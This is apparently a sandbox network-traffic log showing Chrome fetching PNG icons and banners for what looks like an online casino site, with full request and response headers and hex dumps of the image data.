                                                                                                                                                          2024-06-09 22:41:22 UTC722INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0e 00 00 00 11 08 03 00 00 00 da 16 6d ad 00 00 01 7d 50 4c 54 45 00 00 00 4c 8a 4f 63 95 6b 55 90 6f 48 85 54 6a 98 6a 3f 80 58 5a b9 c8 ba 9e 0f 68 b2 77 af a6 29 af a5 1d 91 ad 5a 72 ac 80 97 a4 44 87 a4 3d a1 a2 2d a0 a1 24 68 a0 68 61 9f 5d 6b 96 8b 75 95 75 71 8b 71 5b 73 60 42 49 4d 4b 47 32 00 00 01 71 92 71 63 81 5f 08 04 01 01 04 01 9c 65 02 b9 7f 01 b8 7e 01 d1 93 00 10 45 8d 24 16 02 b6 7b 01 b0 74 01 d8 9c 00 56 2a 00 65 8d 80 62 7f 59 09 2a 3f 65 8e 2e 01 0a 10 33 1d 03 a9 72 02 a6 6e 02 a3 6b 02 98 61 02 91 5d 02 81 51 02 13 0d 02 c6 8c 01 9e 68 01 8d 58 01 78 47 01 e0 a0 00 d9 98 00 98 59 00 95 48 00 2a 17 00 38 8c a5 56 91 9a 5b 8c 8d 57 82 8d 2a 61 8a 1f 67 87 67 90 78 57 76 76 6c
                                                                                                                                                          Data Ascii: PNGIHDRm}PLTELOckUoHTjj?XZhw)ZrD=-$hha]kuuqq[s`BIMKG2qqc_e~E${tV*ebY*?e.3rnka]QhXxGYH*8V[W*aggxWvvl


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          639192.168.2.55042223.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC377OUTGET /pc/image-pc/index/383/menu/nv8.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1591
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:22 GMT
                                                                                                                                                          ETag: "64bf926e-637"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE1[3],EU-GER-frankfurt-EDGE4-CACHE2[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE23[2],EU-FRA-paris-GLOBAL1-CACHE3[0,TCP_HIT,0],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2464727
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 6e5da7a4983c651a743a04d4451c7eae
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 127273
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC1591INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 1a 08 06 00 00 00 ad bf 9c f3 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDRtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          640192.168.2.55042590.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC383OUTGET /pc/image-pc/index/312/nav/liveCasino/05.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC616INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 37279
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 15 Jun 2021 06:40:58 GMT
                                                                                                                                                          ETag: "60c84b7a-919f"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[2],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE11[4],EU-FRA-paris-GLOBAL1-CACHE5[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465102
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 35ebbf9568f02281404069e7ce869c0d
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126900
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC15768INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9b 00 00 00 9b 08 06 00 00 00 75 61 e9 8c 00 00 20 00 49 44 41 54 78 9c ec 7d 07 bc 54 d5 b5 fe b7 f7 a9 d3 e7 f6 0e 97 de cb a5 29 8a 0d 62 2c 98 58 88 25 9a 67 17 b1 c6 f8 34 31 89 f1 25 9a bc 24 2f cf 58 a2 a2 a2 46 4d 34 6a 8a b1 6b 8c 05 51 11 04 2e bd 5f 84 db fb 9d 3e a7 9f ff 6f ef 99 8b b7 81 80 5c 62 7e ff b7 f8 0d f7 cc 99 d3 e6 9c 35 6b ed f5 ad 6f ad 4d 42 f3 7e 85 c3 25 55 13 ca d0 62 07 e0 17 62 70 c4 1c e4 eb 4d 88 89 95 10 8c 46 a4 c5 22 28 89 7a 7c fc d2 fb 98 7d c1 55 90 95 34 34 d3 02 4d ee 06 0d 0d 43 0a f9 28 b2 76 21 25 06 a0 69 06 5a b6 2c 87 6f ec 31 fc ca f6 ec 5c 8f 31 e3 c6 42 f5 84 f7 79 a5 c1 8e 6a bc f9 f4 c3 7c f9 a4 6b 7f 8c f7 7e 77 53 66 f9 a2 85 78 ef af 1b 30 f5
                                                                                                                                                          Data Ascii: PNGIHDRua IDATx}T)b,X%g41%$/XFM4jkQ._>o\b~5koMB~%UbbpMF"(z|}U44MC(v!%iZ,o1\1Byj|k~wSfx0
                                                                                                                                                          2024-06-09 22:41:22 UTC16384INData Raw: 61 41 82 05 d7 15 79 e7 23 36 a7 82 e3 66 fb b3 51 15 82 47 84 19 6b c7 ee e7 de c4 ba 77 de 41 53 47 3b 86 fb 42 68 4b 59 78 b9 b5 0d bf 7a ee 19 94 4f 1f 01 ab a3 03 92 47 82 9d 8a 63 dc d4 d1 98 31 f7 d8 2c c6 66 c0 d4 74 e8 69 03 1f 2e 5b 8f 5f 3d f0 02 36 ed a8 43 3c e1 e1 15 61 e1 5c 3f bc 6c a8 90 6d 2b 82 23 c3 06 71 ea 1b b7 be ef a8 39 d4 a2 b2 6b 13 8b 68 6e dc 19 70 cc ae 0d 40 11 b7 2d 06 8c 0b ae 48 84 5e 57 3a e5 96 d7 b0 ee 9e 5e dd 05 dd 0e 65 7c ba 2b 54 0a 87 0a 08 c0 42 5e a2 01 f0 ec 03 cf 63 0d cb 08 39 6c ca c6 ac 99 9d a5 7d 27 75 03 1d ed 31 ec a9 a9 c7 88 11 15 9c aa 5d b3 a3 86 39 76 84 43 b9 30 4d 07 ad 4d cd 7c 4a 20 2d 95 80 c6 3a 7d b3 c2 17 8f 07 8a 2a 73 eb c6 3a 15 4d 9a 3a 11 a2 22 a1 66 5b 2d af 62 b7 6c 03 b1 8e 28 9f
                                                                                                                                                          Data Ascii: aAy#6fQGkwASG;BhKYxzOGc1,fti.[_=6C<a\?lm+#q9khnp@-H^W:^e|+TB^c9l}'u1]9vC0MM|J -:}*s:M:"f[-bl(
                                                                                                                                                          2024-06-09 22:41:22 UTC5127INData Raw: db d9 05 3d 14 46 5f f7 20 9e 7d f2 49 de 8e 94 d3 fe 5f 93 a7 e8 15 c5 87 ff 63 7d d1 b0 d1 78 fe 57 a6 38 9e 37 a7 fd ae 9b 1e 34 2c 03 47 5c 7e 5d 6d 58 f2 9c b5 bf ff 6d 0a 6c 76 6b 20 6f f4 e3 43 0b 66 e2 57 df be 0c 89 88 8e 62 b9 cc ba 69 a2 24 cf 94 25 e9 9f 05 49 b9 44 52 15 99 08 2a 2c 4b ca 59 4d e3 93 e4 68 c3 96 2e b0 c7 c1 66 fb d7 21 e8 a9 d9 64 a6 3b aa ac c7 78 35 87 65 a8 a8 ed 41 bc 81 42 a9 88 64 45 15 ab 14 31 94 28 d0 f3 65 94 08 1d 76 09 78 49 c4 61 a2 f5 d9 16 73 1f f4 aa 46 ae e7 38 33 0a fb 14 43 74 62 2d e7 01 ab 40 e2 27 f4 36 e6 20 78 b7 8a 82 f2 5f 10 a4 4e df 00 5d d8 e7 01 9c 73 c3 c3 75 9a 16 b1 1f bc e1 c4 54 64 c2 3f 08 0b af fb b7 0b 3d 59 7c fd b9 cf 8d ef a0 53 f1 e9 bf e8 9b 8b 72 a1 f7 a1 ab eb fb cb 74 4a 85 87 ea
                                                                                                                                                          Data Ascii: =F_ }I_c}xW874,G\~]mXmlvk oCfWbi$%IDR*,KYMh.f!d;x5eABdE1(evxIasF83Ctb-@'6 x_N]suTd?=Y|SrtJ


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          641192.168.2.55041890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC657OUTGET /pc/image-pc/index/383/login/password_n.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC614INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 503
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:20 GMT
                                                                                                                                                          ETag: "64bf926c-1f7"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE3[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE24[5],EU-FRA-paris-GLOBAL1-CACHE29[0,TCP_HIT,5],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467536
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 9f2ef225a6954aec0a46a379d2e25bb6
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124464
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC503INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 14 08 06 00 00 00 8d 89 1d 0d 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 01 a9 49 44 41 54 38 8d 9d d5 31 68 13 71 14 c7 f1 8f d7 10 ec 20 84 20 52 4d 48 a1 64 10 1d 8a a8 50 c7 d6 b5 48 2b 55 e8 26 b8 9a c1 0e 16 17 b7 8a 5a 44 87 76 d3 ad 4b 0d d5 8a a2 5b e7 22 8a e2 20 08 41 a4 5a 3b a8 25 b8 d4 08 82 c3 5d 20 8d 77 b9 a3 3f f8 c3 f1 bf df fb be c7 ff fe ef dd be 87 77 a7 c5 28 8f 89 68 9d c1 11 fc c1 57 bc c5 13 3c 8d f6 76 29 17 03 9b c4 1d 54 63 92 1c 8d d6 34 1a 98 c5 e3 4e 53 d0 f1 dc 87 db 91 a1 1b 16 a7 2a 56 a2 98 be b8 0a 6f e2 5a 06 50 b7 da 31 b3 9d 15 4e ed 11 d6 09 9d 6a 03 f3 b8 d7 cb 5d 19 1a 71 a8 74 3c 0d 7a 1f f9 1c 2e a0 1c e7 28 14 2b 46
                                                                                                                                                          Data Ascii: PNGIHDRpHYsIDAT81hq RMHdPH+U&ZDvK[" AZ;%] w?w(hW<v)Tc4NS*VoZP1Nj]qt<z.(+F


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          642192.168.2.55042623.90.149.1064434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC609OUTGET /pc/image-pc/index/382/slot/icon_user.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://xpj723.cc/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC613INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 2110
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Wed, 26 Jul 2023 04:33:16 GMT
                                                                                                                                                          ETag: "64c0a20c-83e"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE4-CACHE2[5],EU-GER-frankfurt-EDGE4-CACHE1[0,TCP_HIT,3],EU-FRA-paris-GLOBAL1-CACHE4[2],EU-FRA-paris-GLOBAL1-CACHE3[0,TCP_HIT,1],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2473789
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 5731c30d4d981eecbf4239f955a0c24a
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 118211
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC2110INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 05 c7 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 31 20 37 39 2e 61 38 64 34 37 35 33 34 39 2c 20 32 30 32 33 2f 30 33 2f 32 33 2d 31 33 3a 30 35 3a 34 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66
                                                                                                                                                          Data Ascii: PNGIHDRw=pHYsiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c001 79.a8d475349, 2023/03/23-13:05:45 "> <rdf


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          643192.168.2.55042190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC652OUTGET /pc/image-pc/index/383/login/icon1.png HTTP/1.1
                                                                                                                                                          Host: zb1-hw.qectyoua.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb1-hw.qectyoua.com/pc/240516-03/static/css/t4045.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC615INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 1231
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Tue, 25 Jul 2023 09:14:19 GMT
                                                                                                                                                          ETag: "64bf926b-4cf"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[4],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-FRA-paris-GLOBAL1-CACHE24[4],EU-FRA-paris-GLOBAL1-CACHE18[0,TCP_HIT,2],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2467536
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: e5cbf0bc8bb730e69ddc8dcad36af4c5
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 124464
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC1231INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0d 00 00 00 0f 08 06 00 00 00 3f 23 45 77 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 26 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20
                                                                                                                                                          Data Ascii: PNGIHDR?#EwtEXtSoftwareAdobe ImageReadyqe<&iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          644192.168.2.55043090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:22 UTC383OUTGET /pc/image-pc/index/312/nav/liveCasino/01.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:22 UTC617INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:22 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 42069
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:47 GMT
                                                                                                                                                          ETag: "5d71fe7f-a455"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[2],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,0],EU-FRA-paris-GLOBAL1-CACHE15[4],EU-FRA-paris-GLOBAL1-CACHE30[0,TCP_HIT,3],1.1 google
                                                                                                                                                          X-CCDN-Expires: 2465102
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: a5c76690e503a84a999b8ec87c3ebd48
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 126900
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:22 UTC15767INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 9b 00 00 00 9b 08 06 00 00 00 75 61 e9 8c 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 00 00 00 00 00 f9 43 bb 7f 00 00 80 00 49 44 41 54 78 da ec fd 77 9c 26 57 75 e7 8f bf 6f a8 aa 27 f7 d3 79 a2 26 8f 46 39 47 10 28 82 40 04 93 8c 01 13 85 24 82 09 f6 62 af ed b5 77 59 db 6b af bd eb 80 c1 80 90 44 06 11 4d 06 e5 84 72 9c 51 1e 69 72 e8 99 ce dd 4f ae 70 ef fd fe 51 f5 74 f7 8c 24 84 40 02 fb f7 db c3 ab d0 4c 4f 3f 4f 55 dd 3a 75 ee 09 9f f3 39 82 ff 27 bf 40 24 0a 85 91 87 b0 ee 8f af 7c ed 84 5a f5 fd aa f3 b1 b1 21 d6 8a 52 e7 f1 73
                                                                                                                                                          Data Ascii: PNGIHDRuagAMAa cHRMz&u0`:pQ<bKGDCIDATxw&Wuo'y&F9G(@$bwYkDMrQirOpQt$@LO?OU:u9'@$|Z!Rs
                                                                                                                                                          2024-06-09 22:41:23 UTC16384INData Raw: 64 f9 b3 60 90 96 c9 2f cd 31 b6 91 78 12 88 b0 49 94 25 8b b3 c6 55 7c ce 7d fd 9b bc eb be 7f 75 8c ce f3 b3 2b be 36 8d f4 ee 24 69 40 3c c2 81 9d ad 73 db cd 29 d6 98 2c 4b fe 1b 1e 03 f7 34 e2 9c 73 b3 b3 b3 0c 0f f6 52 0c 06 a8 4d ec 63 7c 72 92 62 b9 17 94 87 43 1e 94 bb 3a d8 87 4b ef 41 2b 85 92 12 e1 a5 4d cd 5d 9e 11 63 d3 97 49 6b 4d 3e 9f e7 90 43 56 d2 aa 37 31 09 48 d9 e1 88 23 0e c3 5a c3 c8 c8 28 ed d6 dd d9 53 ef a2 42 24 49 62 c0 f9 c4 b1 a5 51 6f b2 e2 90 45 ec de b3 9d c9 c9 29 c2 30 44 48 31 09 8c f1 3c 91 c6 9b ac b2 63 8c c1 59 77 8a 94 f2 87 4a 2a e2 24 e4 a7 ff fe bd 98 dc c6 6b 10 e5 8c 9b 2d 07 ce f1 92 57 bf d6 bb e5 47 5f 88 c1 90 11 00 cf 49 82 49 73 71 d1 34 c2 b6 b6 85 ba b0 01 57 7c 08 e1 a3 25 60 75 2f 4b 5f f3 5e 3f f2
                                                                                                                                                          Data Ascii: d`/1xI%U|}u+6$i@<s),K4sRMc|rbC:KA+M]cIkM>CV71H#Z(SB$IbQoE)0DH1<cYwJ*$k-WG_IIsq4W|%`u/K_^?
